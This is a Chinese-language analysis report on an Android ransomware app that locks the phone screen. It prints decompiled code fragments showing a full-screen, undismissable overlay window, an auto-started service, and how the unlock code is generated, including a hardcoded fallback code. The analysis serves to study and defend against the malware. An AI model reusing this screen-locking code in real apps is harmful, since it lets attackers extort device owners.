1.基本信息
病毒名称: a.privacy.fakeccb.a
文件名称: BWM在线
文件MD5: E32377EE18BF0D853D5B45DEDFB6997D
文件包名: com.qqquanquan1031606149
危害属性: 恶意勒索
2.基本行为
程序启动后直接锁屏,以勒索用户
3.详细分析
1、在入口函数内启动服务
try
{
paramView = Class.forName("com.qqquanquan1031606149.s"); //启动服务,文件名为"s"
startService(new Intent(this, paramView));
return;
}
"FLAG_FULLSCREEN"、"FLAG_LAYOUT_IN_SCREEN"配合"SYSTEM_ALERT_WINDOW"权限,使这个悬浮窗全屏置顶且无法清除,造成手机屏幕无法正常使用。
private void createFloatView()
{
this.wmParams = new WindowManager.LayoutParams();
Application localApplication = getApplication();
getApplication();
this.mWindowManager = ((WindowManager)localApplication.getSystemService(Context.WINDOW_SERVICE));
this.wmParams.type = 2010;
this.wmParams.format = 1;
this.wmParams.flags = 1280; //此处修改为了1280
this.wmParams.gravity = 49;
this.wmParams.x = 0;
this.wmParams.y = 0;
this.wmParams.width = -1;
this.wmParams.height = -1;
this.mFloatLayout = LayoutInflater.from(getApplication()).inflate(2130903041, (ViewGroup)null);
this.mWindowManager.addView(this.mFloatLayout, this.wmParams);
this.bt = ((Button)this.mFloatLayout.findViewById(2131165190));
this.ed = ((EditText)this.mFloatLayout.findViewById(2131165189));
this.tv = ((TextView)this.mFloatLayout.findViewById(2131165187));
this.bt.setOnClickListener(new View.OnClickListener()
3、在处理解除锁屏密码时,作者加入异常处理函数,只有在触发异常后,才能够实现解锁
this.tv.setText("解锁随机码" + this.ppss); //ppss即为解锁码
public void onCreate() { LogCatBroadcaster.start(this); super.onCreate(); this.pass = ((Math.random() * 10000000)); this.passw = ((int)(Math.random() * 1000000)); this.share = getSharedPreferences("QQ1031606149", 0); this.editor = this.share.edit(); if (isNetworkConnected(getApplicationContext())) //判读是否有网络连接,没有网络连接时,给ppss赋值,即为解锁码 { if (this.share.getLong("m", 0) == 0) { this.editor.putLong("m", this.pass); this.editor.commit(); } try { this.editor.commit(); label126: this.ppss = (this.share.getLong("m", 8) + ""); new Thread() { public void run() {} }.start(); return; } catch (Exception localException1) { break label126; } } try { this.ppss = "831524"; } catch (Exception localException2) { for (;;) { try { this.password = "第六感是我爷爷";
return;
} catch (Exception localException3) {} localException2 = localException2; } } }